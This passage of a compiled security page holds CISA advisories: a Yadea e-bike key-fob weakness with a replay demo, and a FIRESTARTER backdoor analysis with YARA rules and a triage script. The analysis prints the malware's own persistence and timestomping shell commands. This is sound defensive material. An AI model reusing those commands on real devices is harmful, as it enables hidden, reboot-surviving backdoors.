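    _pending[pnr] = (_code_hash(code), now + CODE_TTL_SECONDS, MAX_ATTEMPTS)
    return code                       # would be sent to record["owner"] out of band


def finish_manage_booking(pnr, code, now=None):
    """Step 2: release the record only for a fresh, unexpired, correct code."""
    now = time.time() if now is None else now
    state = _pending.get(pnr)
    if state is None:
        raise Forbidden("no pending verification")
    expected, expiry, attempts_left = state
    if now > expiry or attempts_left <= 0:
        _pending.pop(pnr, None)
        raise Forbidden("verification expired")
    if not hmac.compare_digest(expected, _code_hash(code)):
        _pending[pnr] = (expected, expiry, attempts_left - 1)
        raise Forbidden("incorrect code")
    _pending.pop(pnr, None)           # single use
    return BOOKINGS[pnr]


def raises_forbidden(fn, *args):
    """True when fn(*args) raises Forbidden; used by the checks below."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```

The ownership check in `profile_booking` is the whole fix for the CWE-639 case; the predictable PNR format the advisory mentions only matters because the server never asked who was asking. For the public page, the point of the second step is that a PNR and a surname are things many parties legitimately know, so they can start a lookup but should not on their own release the full record; the attempt budget and expiry keep the added code from becoming a new guessable key.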

Yadea T5 Electric Bicycle

Summary
Successful exploitation of this vulnerability could result in an attacker being able to unlock and start the bicycle, leading to vehicle theft.

The following versions of Yadea T5 Electric Bicycle are affected:
- T5 Electric Bicycle vers:all/* (CVE-2025-70994)

CVSS v3: 7.3
Vendor: Yadea
Equipment: Yadea T5 Electric Bicycle
Vulnerabilities: Weak Authentication

Background
Critical Infrastructure Sectors: Transportation Systems
Countries/Areas Deployed: Worldwide
Company Headquarters Location: China

Vulnerabilities

CVE-2025-70994
Yadea T5 Electric Bicycles have a weak authentication mechanism which is vulnerable to signal forgery after a local attacker intercepts any legitimate key fob transmissions.
Affected Products: Yadea T5 Electric Bicycle (Vendor: Yadea); Product Version: vers:all/*; Product Status: known_affected
Remediations: Mitigation: Yadea did not respond to CISA's attempts at coordination. Users of Yadea T5 Electric Bicycles are encouraged to keep their systems up to date and lock their property securely with external mechanisms. Users can contact Yadea at https://yadea.com/contact-us.
Relevant CWE: CWE-1390 Weak Authentication
Metrics: CVSS v3.1: Base Score 7.3, Base Severity HIGH, Vector String CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Acknowledgments
Ashen Chathuranga reported this vulnerability to MITRE and CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

Revision History
Initial Release Date: 2026-04-23
2026-04-23 | Revision 1 | Initial Publication
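The advisory describes the failure mode of CWE-1390 for a key fob: once a legitimate transmission has been observed, it can be reproduced, because nothing in the exchange is fresh. The following added example, written for this page and not Yadea's protocol or firmware, models that with a fixed-code fob beside a challenge-response fob; the frame formats, the "UNLOCK" label, the class names and the key sizes are assumptions. Its only purpose is to show what property a remote-unlock design needs so that an intercepted frame is worthless afterwards.

```python
"""Why a static key-fob frame fails once observed, and why a challenge-response
fob does not. Added example; the frame formats, class names and key handling
are assumptions, not Yadea's protocol."""
import hashlib
import hmac
import secrets


class FixedCodeFob:
    """Weak design: every UNLOCK frame is identical (constructed stand-in for
    a fixed-code transmitter)."""
    def __init__(self, code):
        self.code = code

    def frame(self):
        return self.code                 # the bytes that go over the air


class FixedCodeBike:
    def __init__(self, code):
        self.code = code

    def receive(self, frame):
        # accepts any frame that equals the programmed code, however old
        return hmac.compare_digest(frame, self.code)


class ChallengeResponseFob:
    """Stronger design: the fob proves possession of a shared key by answering
    a fresh random challenge chosen by the bicycle."""
    def __init__(self, key):
        self.key = key

    def answer(self, challenge):
        return hmac.new(self.key, b"UNLOCK" + challenge, hashlib.sha256).digest()


class ChallengeResponseBike:
    def __init__(self, key):
        self.key = key
        self.challenge = None

    def issue_challenge(self):
        self.challenge = secrets.token_bytes(16)   # fresh for every attempt
        return self.challenge

    def receive(self, frame):
        if self.challenge is None:
            return False                           # no outstanding challenge
        expected = hmac.new(self.key, b"UNLOCK" + self.challenge, hashlib.sha256).digest()
        self.challenge = None                      # single use, even on failure
        return hmac.compare_digest(expected, frame)


def demo_fixed_code():
    """Returns (legitimate frame accepted, same frame accepted again later)."""
    code = secrets.token_bytes(4)
    bike, fob = FixedCodeBike(code), FixedCodeFob(code)
    observed = fob.frame()               # what a nearby receiver would record
    first = bike.receive(observed)       # the owner's unlock
    later = bike.receive(observed)       # the identical frame, presented again
    return first, later


def demo_challenge_response():
    """Returns (legitimate answer accepted, recorded answer accepted again later)."""
    key = secrets.token_bytes(32)
    bike, fob = ChallengeResponseBike(key), ChallengeResponseFob(key)
    observed = fob.answer(bike.issue_challenge())   # one recorded exchange
    first = bike.receive(observed)                  # the owner's unlock
    bike.issue_challenge()                          # next attempt gets a new challenge
    later = bike.receive(observed)                  # old answer no longer matches
    return first, later


def demo_no_challenge():
    """A response offered without any outstanding challenge is rejected."""
    key = secrets.token_bytes(32)
    bike, fob = ChallengeResponseBike(key), ChallengeResponseFob(key)
    return bike.receive(fob.answer(b"\x00" * 16))
```

The bicycle side needs two things the fixed-code design lacks: a source of unpredictable challenges and a per-device secret that never leaves the fob and the controller. Rolling codes with a counter window are the other common way to get freshness without a two-way radio, but they share the same requirement that the transmitted value change on every use.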

FIRESTARTER Backdoor

Malware Analysis Report at a Glance
Malware Name: FIRESTARTER
Original Publication: April 23, 2026

Executive Summary
The Cybersecurity and Infrastructure Security Agency (CISA) analyzed a sample of FIRESTARTER malware obtained from a forensic investigation. CISA and the United Kingdom National Cyber Security Centre (NCSC) assess that advanced persistent threat (APT) actors are using FIRESTARTER malware for persistence, specifically targeting publicly accessible Cisco Firepower and Secure Firewall devices running Adaptive Security Appliance (ASA) or Firepower Threat Defense (FTD) software. CISA and the NCSC are releasing this Malware Analysis Report to share analysis of one FIRESTARTER malware sample operating as a backdoor and to urge organizations to take key response actions.

Note: The release of this Malware Analysis Report aligns with CISA's update to V1: Emergency Directive (ED) 25-03: Identify and Mitigate Potential Compromise of Cisco Devices and Supplemental Direction ED 25-03: Core Dump and Hunt Instructions. The malware outlined in this report is relevant for both Cisco Firepower and Secure Firewall devices; however, CISA has only observed a successful implant of the malware in the wild on a Cisco Firepower device running ASA software.

Key Actions for U.S. FCEB Agencies
- Collect and submit core dumps to CISA's Malware Next Generation platform.
- Immediately report the submission via CISA's 24/7 Operations Center; CISA will reach out with next steps.
- Take no additional action until CISA provides further guidance.

Key Actions for All Other Organizations
- Use the YARA rules to detect FIRESTARTER malware against either a disk image or core dump of a device.
- Report any findings to CISA or the NCSC.
- If compromise is confirmed, conduct incident response actions.

Intended Audience
Organizations: Government and critical infrastructure organizations (Note: While this publication supplements CISA ED 25-03, the guidance is applicable to all organizations, including U.K. organizations.)
Sector: Government Services and Facilities Sector
Roles: Digital forensics analysts, incident responders, vulnerability analysts, system administrators

Introduction
The Cybersecurity and Infrastructure Security Agency (CISA) analyzed a sample of FIRESTARTER malware obtained from a forensic investigation. CISA and the United Kingdom National Cyber Security Centre (NCSC) assess that FIRESTARTER—a backdoor that allows remote access and control—is part of a widespread campaign that afforded an advanced persistent threat (APT) actor initial access to Cisco Adaptive Security Appliance (ASA) firmware by exploiting CVE-2025-20333 [CWE-862: Missing Authorization] and/or CVE-2025-20362 [CWE-120: Classic Buffer Overflow]. For more information on this campaign, see CISA's original version of Emergency Directive (ED) 25-03: Identify and Mitigate Potential Compromise of Cisco Devices (released Sept. 25, 2025).

CISA and the NCSC assess that FIRESTARTER can persist as an active threat on Cisco devices running ASA or Firepower Threat Defense (FTD) software, maintaining post-patching persistence and enabling threat actors to re-access compromised devices without re-exploiting vulnerabilities. U.S. Federal Civilian Executive Branch (FCEB) agencies are required to implement the new required actions in CISA's updated Emergency Directive (V1: ED 25-03). CISA and the NCSC urge other U.S. and U.K. organizations to use the YARA rules to detect FIRESTARTER malware against either a disk image or core dump of a device and report any findings to CISA or the NCSC. Organizations can also refer to Cisco's Security Advisory and Talos Blog.

Download the PDF version of this report: AR26-113A_MAR_FIRESTARTER_backdoor_ (PDF, 604.62 KB)
For a downloadable copy of the YARA rules associated with this malware, see: FIRESTARTER_STIX (JSON, 24.27 KB)

FIRESTARTER Collection
CISA is authorized to monitor for, analyze, and notify U.S. FCEB agencies of anomalous or suspected malicious activity detected on federal networks. Through continuous monitoring, CISA identified suspicious connections on one U.S. FCEB agency's Cisco Firepower device running ASA software. CISA notified and validated the true positive finding with agency personnel and initiated a forensic engagement. During the engagement, CISA discovered one malware sample—named FIRESTARTER—on the Firepower device. In this incident, APT actors initially deployed LINE VIPER as a post-exploitation implant and subsequently used FIRESTARTER as a persistence mechanism to maintain continued access to the compromised device. Although Cisco's patches addressed CVE-2025-20333 and CVE-2025-20362, devices compromised prior to patching may remain vulnerable because FIRESTARTER is not removed by firmware updates.

Threat Actor Activity
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 18. See Appendix A: MITRE ATT&CK Techniques for tables mapping the cyber actors' activity to MITRE ATT&CK tactics and techniques.

CISA's analysis identified the following:
- Initial Access: CISA assesses, but has not confirmed, that APT actors obtained initial access by exploiting CVE-2025-20333 and/or CVE-2025-20362 [T1190]. CISA has not confirmed the exact date of initial exploitation but assesses the compromise occurred in early September 2025, before the agency implemented patches in accordance with ED 25-03.
- Privilege Escalation and Defense Evasion: CISA identified that APT actors first deployed LINE VIPER to establish illegitimate virtual private network (VPN) sessions [T1133] that bypassed all VPN authentication policies. This activity was associated with user accounts that existed but were no longer active within the agency [T1078]. Although this behavior was observed in this incident, threat actors may use other (including fabricated) accounts. LINE VIPER gave APT actors access to all configuration elements of the victim Firepower device, including administrative credentials, certificates, and private keys [T1082].
- Persistence: APT actors deployed FIRESTARTER on the Firepower device before Sept. 25, 2025 (exact date unknown). Because it was present before patching, FIRESTARTER persisted through remediation and established command and control (C2) channels on the victim Firepower device [T1219]. APT actors leveraged FIRESTARTER to regain access without re-exploiting the original vulnerabilities and deployed LINE VIPER in March 2026.

Malware Summary
FIRESTARTER is a Linux Executable and Linkable Format (ELF) file designed to execute on Cisco Firepower and Secure Firewall devices, serving as a C2 channel for remote access and control. The malware achieves persistence by detecting termination signals and relaunching itself, and it can survive firmware updates and device reboots unless a hard power cycle occurs. FIRESTARTER attempts to install a hook—a way to intercept and modify normal operations—within LINA, the device's core engine for network processing and security functions. This hook enables the execution of arbitrary shellcode provided by the APT actors, including the deployment of LINE VIPER.

Note: The file CISA obtained for analysis was named lina_cs; filenames may vary, as threat actors can easily modify the name of the malicious file.

Malware Functionality

Initialization
Upon execution, FIRESTARTER accesses its own binary located at /usr/bin/lina_cs on the device [T1036.005] and copies its contents into memory. It then registers a callback function that triggers when the program receives any of the following termination-related signals [T1546.004]:
- SIGTERM
- SIGINT
- SIGQUIT
- SIGABRT
- SIGHUP
- SIGTSTP

After copying itself into the heap and updating the signal handlers, the shell executor runs the following commands in sequence:

    rm /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST 2>/dev/null
    cp /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST 2>/dev/null
    chmod 755 /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST 2>/dev/null
    chown --reference=/opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST 2>/dev/null
    touch -r /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST 2>/dev/null
    rm /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp 2>/dev/null
    rm /usr/bin/lina_cs 2>/dev/null

These commands delete the modified CSP_MOUNT_LIST file [T1070.004], restoring the original CSP_MOUNT_LIST from the temporary copy. Execute permissions are granted to any user, the owner and timestamp are set to match the original [T1070.006], and the temporary file is then deleted. Finally, /usr/bin/lina_cs is deleted.

Persistence and Shutdown Task
When any of these signals is received or runlevel 6 is reached, the callback function is triggered and first checks whether the /opt/cisco/platform/logs/var/log/ directory exists. If absent, it creates the directory with full read/write/execute permissions [T1222]. The callback then opens /opt/cisco/platform/logs/var/log/svc_samcore.log and writes a copy of itself to this file, which is in a reboot-persistent directory. Next, the callback verifies whether /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST is present on the device. If the file is missing, FIRESTARTER creates it using a special function that can run shell commands [T1059].

After creating the file, the malware runs a series of callback commands (in sequential order) to establish persistence and manage its files:

    cp /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp 2>/dev/null
    chown --reference=/opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp 2>/dev/null
    touch -r /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST.tmp 2>/dev/null

It then appends the following contents to /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST:

    mv /opt/cisco/platform/logs/var/log/svc_samcore.log /usr/bin/lina_cs
    chmod 755 /usr/bin/lina_cs
    lina_cs &

These commands first create a temporary copy of CSP_MOUNT_LIST with the same ownership information and timestamps. A script is then appended to CSP_MOUNT_LIST. This script is the persistence mechanism: it moves FIRESTARTER from its staging location, svc_samcore.log, to /usr/bin/lina_cs, makes it executable, and runs it in the background [T1547]. This sequence ensures persistent execution of the file even when termination signals are received. All commands redirect standard error (stderr) to /dev/null, hiding any error messages from the console [T1564].

Memory Scanning and Hook Installation
The process enumerates LINA's virtual memory map to locate the private read-write (rw-p) segment associated with lina [T1057], which represents the main process's writable data region. Once identified, this memory segment is parsed using a custom algorithm to locate the XML handler element table. The algorithm inspects each 0x260-byte region for element IDs. After identifying five element IDs in the correct offset sequence (each separated by 0x260 bytes), it calculates and stores the handler pointer address for the seventeenth element.

Shellcode Injection
FIRESTARTER scans LINA's memory to locate the executable (r-xp) segment of libstdc++.so, which corresponds to the C++ standard library's code section. The malware injects a block of shellcode 0x200 bytes before the end of the library's text segment, installing the detour for the XML element handler [T1055]. The process then resumes its main loop and continues operating until it detects a reboot runlevel or one of the termination-related signals.

Victim Identification and Stage Loading
The FIRESTARTER malware closely mirrors the RayInitiator Cisco ASA bootkit stage 3 deploy path. The injected shellcode is triggered when LINA processes a WebVPN request containing the XML tag with the detoured handler. Within the <group-select> element, the malware searches for a hard-coded 8-byte ASCII string unique to the installation, verifying it against a predefined value embedded in the shellcode. Additionally, a victim-specific ID—another hard-coded 8-byte sequence—is compared against WebVPN request elements until a match is found. Upon successful verification of identification, the next stage of the malware is loaded by copying it into LINA's memory and invoking mprotect to enable execution of the newly injected code [T1543].

Detection

U.S. FCEB Agency Instructions
The primary detection method for FIRESTARTER is memory analysis. In accordance with V1: ED 25-03, all U.S. FCEB agencies are required to collect device core dumps and submit them to CISA's Malware Next Generation (MNG) platform (see the Incident Response section), which analyzes core dumps for the presence and behavior of the lina_cs binary. U.S. FCEB agencies should not take further action without first consulting CISA. To preserve evidence, avoid hard power cycles and other changes (e.g., reboots, patching, configuration changes) before collection and coordination, as these can affect volatile artifacts.

Other U.S. and U.K. Recommendations
CISA and the NCSC recommend using the following CISA-created YARA rules to detect FIRESTARTER when applied to a disk image or a core dump from a device. To obtain a disk image, open a Cisco Technical Assistance Center (TAC) case.
For instructions on obtaining a core dump, see CISA’s Supplemental Direction for ED 25-03. Note: CISA recommends following this Supplemental Direction rather than other open source resources, as APT actors commonly employ anti-forensic techniques. YARA Rules See Table 1 for a list of FIRESTARTER YARA rules. Table 1. YARA Rules FIRESTARTER Rule 1 rule CISA_261290_01 : FIRESTARTER backdoor captures_system_state_data cleans_traces_of_infection fingerprints_host persists_after_system_reboot {  meta:       author = "CISA Code & Media Analysis"       incident = "261290"       date = "2026-4-3"       last_modified = "20260406_732"       actor = "n/a"       family = "n/a"       capabilities = "captures-system-state-data cleans-traces-of-infection fingerprints-host persists-after-system-reboot"       malware_type = "backdoor"       tool_type = "unknown"       description = "Detects CISCO Firepower FIRESTARTER injector samples"   strings:        $s1 = { 57 48 C1 EF 0C 48 C1 E7 0C BA 07 00 00 00 48 C7 C6 00 20 00 00 }        $s2 = { 2f 6f 70 74 2f 63 69 73 63 6f 2f 70 6c 61 74 66 6f 72 6d 2f 6c 6f 67 73 2f 76 61 72 2f 6c 6f 67 2f }        $s3 = { 2f 6f 70 74 2f 63 69 73 63 6f 2f 63 6f 6e 66 69 67 2f 70 6c 61 74 66 6f 72 6d 2f 72 6d 64 62 2f }        $s4 = { 2f 76 61 72 2f 72 75 6e 2f 72 75 6e 6c 65 76 65 6c}        $s5 = { 2f 70 72 6f 63 2f 25 73 2f 63 6f 6d 6d }        $s6 = { 2f 70 72 6f 63 2f 25 64 2f 6d 61 70 73 }        $s7 = { 2f 61 73 61 2f 62 69 6e 2f 6c 69 6e 61 }   condition:        5 of them } FIRESTARTER Rule 2 rule CISA_261290_02 : FIRESTARTER_shellcode backdoor captures_system_state_data cleans_traces_of_infection fingerprints_host persists_after_system_reboot {   meta:       author = "CISA Code & Media Analysis"       incident = "261290"       date = "2026-4-3"       last_modified = "20260406_732"       actor = "n/a"       family = "n/a"       capabilities = "captures-system-state-data cleans-traces-of-infection fingerprints-host persists-after-system-reboot"   
    malware_type = "backdoor"       tool_type = "unknownk"       description = "Detects CISCO Firepower FIRESTARTER_shellcode samples"    strings:        $1 = { 57 4C 8B 47 18 4D 85 C0 0F 84 C7 01 00 00 49 8B 38 48 85 FF }        $2 = { 48 83 C6 08 4C 39 C6 0F 87 7A 01 00 00 4C 8B 0E }        $3 = { 48 89 D7 4C 89 CE B9 D0 01 00 F3 A4 48 89 D7 57 48 C1 EF 0C 48 C1 E7 0C }        $4 = { 0F 05 58 5F FF E0 90 90 }    condition:        3 of them } Sigma Rules Given the nature of this malware, Sigma rules do not offer effective detection because it does not generate observable log events or behavioral anomalies in standard monitoring platforms. Incident Response U.S. FCEB Agencies CISA requires U.S. FCEB agencies to: Refer to the Supplemental Direction for ED 25-03 for guidance on running the “show checkheaps” and “show tech-support detail” commands. Ensure to save the full output off the device (preferably to an isolated system). Generate a core dump from the affected Cisco device(s) and submit it through CISA’s Malware Next Generation platform. Report the submission immediately via CISA’s 24/7 Operations Center (contact@cisa.dhs.gov, 1-844-Say-CISA [1-844-729-2472], or CISA’s Incident Reporting System). Identify the activity is related to FIRESTARTER. After incident intake, CISA will provide guidance on next steps. If compromise is confirmed, this may include instructions to physically unplug the device from power to remove FIRESTARTER’s persistence. Organizations should not unplug the device unless directed to do so by CISA. Other U.S. Organizations CISA recommends organizations take the following actions: Although applicable to U.S. FCEB agencies, refer to the Supplemental Direction for ED 25-03 for guidance on running the “show checkheaps” and “show tech-support detail” commands. Ensure to save the full output off the device (preferably to an isolated system). Generate a core dump from the affected Cisco device(s) and deploy the provided YARA rules. U.S. 
organizations can submit core dumps through CISA’s Malware Next Generation platform. If the core dump indicates the presence of FIRESTARTER malware, proceed with steps 3 and 4 below; additionally, activate internal incident response plans to assess potential lateral movement and impact: Unplug the device from all power sources—CISA assesses this is the only method to remove FIRESTARTER’s persistence from a device—then conduct the following steps: Locate the physical device. Unplug the physical device from its power source while the device is still powered on. Note: It is not sufficient to power the device off or reboot it. The device must be entirely removed from all power sources, including duplicate power sources created for redundancy. Leave the device fully disconnected from any power source for one minute. Reconnect the device to its power source and allow it to reboot. Promptly report any detection of FIRESTARTER malware to CISA. U.S. organizations can report to CISA’s 24/7 Operations Center (contact@cisa.dhs.gov, 1-844-Say-CISA [1-844-729-2472], or CISA’s Incident Reporting System). Requests for assistance can also be submitted to CISA via this reporting channel. U.K. Organizations The NCSC recommends U.K. organizations take the following actions: Refer to the Supplemental Direction for ED 25-03 for guidance on running the “show checkheaps” and “show tech-support detail” commands. Ensure to save the full output off the device (preferably to an isolated system). Generate a core dump from the affected Cisco device(s) and deploy the provided YARA rules. If FIRESTARTER is detected, report an incident to the NCSC via https://report.ncsc.gov.uk. After reporting an incident, the NCSC will provide guidance on next steps. If compromise is confirmed, this may include instructions to physically unplug the device from power to remove FIRESTARTER’s persistence. Organizations should not unplug the device unless directed to do so by the NCSC. 
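The persistence artifacts described in the report (the script appended to CSP_MOUNT_LIST, the staged copy written to svc_samcore.log, the ownership and mtime copied from the original file) can be triaged offline on a disk image obtained through the TAC process. The script below is an added example and is not CISA, NCSC or Cisco tooling; the ctime-versus-mtime check assumes the image preserves the original inode metadata, and the sample filesystem it builds is constructed for demonstration.

```python
"""Offline triage of an extracted Cisco Firepower root filesystem for the
FIRESTARTER persistence artifacts described in the report. Added example,
not CISA/NCSC/Cisco tooling; run it on a disk image, never the live device."""
import os
import tempfile
import time
from dataclasses import dataclass, field
from pathlib import Path

# Paths named in the report, relative to the image root.
MOUNT_LIST = "opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST"
MOUNT_LIST_TMP = MOUNT_LIST + ".tmp"
STAGING_FILE = "opt/cisco/platform/logs/var/log/svc_samcore.log"
BINARY = "usr/bin/lina_cs"
# Fragments of the script the report says FIRESTARTER appends to CSP_MOUNT_LIST.
PERSISTENCE_MARKERS = ("svc_samcore.log", "/usr/bin/lina_cs", "lina_cs &")
ELF_MAGIC = b"\x7fELF"


@dataclass
class TriageResult:
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def _starts_with_elf(path: Path) -> bool:
    """A file under .../var/log/ should never carry an ELF header."""
    try:
        with path.open("rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:  # missing file or a directory: nothing to flag
        return False


def triage_image(root: str) -> TriageResult:
    """Check one extracted filesystem root for the artifacts above."""
    base, result = Path(root), TriageResult()

    mount_list = base / MOUNT_LIST
    if mount_list.is_file():
        text = mount_list.read_text(errors="replace")
        hits = [m for m in PERSISTENCE_MARKERS if m in text]
        if hits:
            result.findings.append(f"{MOUNT_LIST}: persistence script fragments {hits}")
        st = mount_list.stat()
        # touch -r copies atime/mtime but cannot set ctime, so a ctime far
        # later than mtime matches the timestomp the report describes. Only
        # meaningful if the image preserves the original inode metadata.
        if st.st_ctime - st.st_mtime > 60:
            result.findings.append(f"{MOUNT_LIST}: ctime later than mtime (possible timestomp)")

    if (base / MOUNT_LIST_TMP).exists():
        result.findings.append(f"{MOUNT_LIST_TMP}: leftover working copy present")

    if _starts_with_elf(base / STAGING_FILE):
        result.findings.append(f"{STAGING_FILE}: 'log' file is an ELF binary (staged copy)")

    if (base / BINARY).exists():
        result.findings.append(f"{BINARY}: present (name of the analysed sample; names may vary)")

    return result


def build_sample_image(root: str, compromised: bool) -> None:
    """Constructed sample filesystem for demonstration; not real device data."""
    mount_list = Path(root) / MOUNT_LIST
    mount_list.parent.mkdir(parents=True, exist_ok=True)
    lines = ["# constructed stand-in for the device's mount list", "/dev/sda1 /mnt/disk0"]
    if compromised:  # the three lines the report says are appended
        lines += ["mv /opt/cisco/platform/logs/var/log/svc_samcore.log /usr/bin/lina_cs",
                  "chmod 755 /usr/bin/lina_cs", "lina_cs &"]
    mount_list.write_text("\n".join(lines) + "\n")
    if compromised:
        old = time.time() - 365 * 86400      # emulate touch -r against an old reference file
        os.utime(mount_list, (old, old))     # mtime goes back, ctime stays "now"
        staging = Path(root) / STAGING_FILE
        staging.parent.mkdir(parents=True, exist_ok=True)
        staging.write_bytes(ELF_MAGIC + b"\x00" * 60)  # constructed ELF-header stub, not malware


def demo() -> dict:
    """Triage a constructed compromised image and a constructed clean one."""
    results = {}
    for label, compromised in (("compromised", True), ("clean", False)):
        with tempfile.TemporaryDirectory() as tmp:
            build_sample_image(tmp, compromised)
            results[label] = triage_image(tmp)
    return results


if __name__ == "__main__":
    for label, res in demo().items():
        print(f"{label}: {'SUSPICIOUS' if res.suspicious else 'no FIRESTARTER artifacts found'}")
        for finding in res.findings:
            print("  -", finding)
```

Point `triage_image()` at the mounted root of a forensic image; a positive result is a reason to follow the reporting steps above, not a substitute for the core-dump analysis CISA describes.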
Mitigations

CISA and the NCSC recommend all organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals 2.0 (CPG 2.0) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections recommended for all organizations. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPG 2.0 webpage for more information on the CPGs, including additional recommended baseline protections.

- Maintain all systems and software with the latest security patches, prioritizing expedited remediation of vulnerabilities listed in CISA’s Known Exploited Vulnerabilities (KEV) Catalog [CPG 2.B]. At the time of ED 25-03’s release (Sept. 25, 2025), available patches did not specifically remediate FIRESTARTER; although patching mitigated initial access, it did not eliminate this persistence mechanism. For additional information on software updates that prevent FIRESTARTER’s persistence and for remediation guidance, refer to Cisco’s Security Advisory.
- Inventory all network edge devices [CPG 2.A], with a specific focus on Cisco devices. Monitor these devices for any suspicious network connections that correlate with the activity described in this report.
- Monitor and audit activity for all accounts with elevated privileges, including network administrators and service accounts, to detect unauthorized use or anomalous behavior. For example, track and review commands executed by these accounts, and promptly investigate any suspicious activity identified.
- Apply the principle of least privilege and restrict service accounts to needed permissions only [CPG 3.H].
- Regularly rotate passwords for privileged accounts (such as network administrators) and service accounts. Routine password changes invalidate credentials that threat actors may have compromised, forcing them to reestablish access and increasing the likelihood of detection or disruption.
- While not specific to FIRESTARTER, modernize administrative access controls by implementing TACACS+ over TLS 1.3. This approach encrypts device administration Authentication, Authorization, and Accounting traffic, safeguards administrator and service account credentials, and reduces the risk of interception [CPG 3.K]. See Cisco’s blog, Modernizing TACACS+: Why Full-Session Encryption Matters More Than Ever.

Disclaimer

CISA and the NCSC do not endorse any commercial entity, product, company, or service, including any entities, products, companies, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by CISA or the NCSC.

Acknowledgements

Cisco contributed to this Malware Analysis Report.

Version History

April 23, 2026: Initial version.

Appendix A: MITRE ATT&CK Techniques

See Table 2 through Table 7 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 2. Initial Access
- Exploit Public-Facing Application (T1190): The APT actors gained access to the victim’s Cisco Firepower device, likely by exploiting CVE-2025-20333 and/or CVE-2025-20362.

Table 3. Execution
- Command and Scripting Interpreter (T1059): FIRESTARTER uses a special function to run shell commands that create /opt/cisco/config/platform/rmdb/CSP_MOUNT_LIST if it is missing. FIRESTARTER runs callback commands to manage its files.

Table 4. Persistence
- Create or Modify System Process (T1543): FIRESTARTER invokes mprotect to enable execution of newly injected code.
- Event Triggered Execution: Unix Shell Configuration Modification (T1546.004): FIRESTARTER registers a callback function that is automatically triggered when the program receives any of the following termination-related signals: SIGTERM, SIGINT, SIGQUIT, SIGABRT, SIGHUP, or SIGTSTP.
- Boot or Logon Autostart Execution (T1547): Persistence is maintained by modifying a boot-time configuration/mount script so FIRESTARTER runs on startup.
- External Remote Services (T1133): The APT actors used LINE VIPER to establish illegitimate VPN sessions.
- Valid Accounts (T1078): The APT actors used valid user accounts for their illegitimate VPN sessions (the user accounts belonged to former employees).

Table 5. Defense Evasion
- File and Directory Permissions Modification (T1222): FIRESTARTER creates the /opt/cisco/platform/logs/var/log/ directory with full read/write/execute permissions. FIRESTARTER uses chown and chmod to modify file permissions.
- Hide Artifacts: Hidden Users (T1564): FIRESTARTER redirects standard error (stderr) messages to /dev/null and hides them from the console.
- Indicator Removal on Host: File Deletion (T1070.004): FIRESTARTER deletes the following files: CSP_MOUNT_LIST, CSP_MOUNT_LIST.tmp, and /usr/bin/lina_cs.
- Indicator Removal on Host: Timestomp (T1070.006): FIRESTARTER uses touch -r to copy timestamps from original files to modified and temporary ones, explicitly to match the original.
- Masquerading: Match Legitimate Resource Name or Location (T1036.005): FIRESTARTER accesses its own binary located at /usr/bin/lina_cs on the victim device.
- Process Injection (T1055): FIRESTARTER injects shellcode into a library’s code section before the start of the text segment.

Table 6. Discovery
- Process Discovery (T1057): FIRESTARTER enumerates LINA’s virtual memory map to locate the private read-write (rw-p) segment associated with lina.
- System Information Discovery (T1082): The APT actors used LINE VIPER to access Cisco Firepower device configuration elements, including administrative credentials, certificates, and private keys.

Table 7. Command and Control
- Remote Access Tools (T1219): FIRESTARTER is a Linux ELF designed to execute on Cisco Firepower and Secure Firewall devices, serving as a C2 channel for remote access and control.

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-39987 Marimo Remote Code Execution Vulnerability

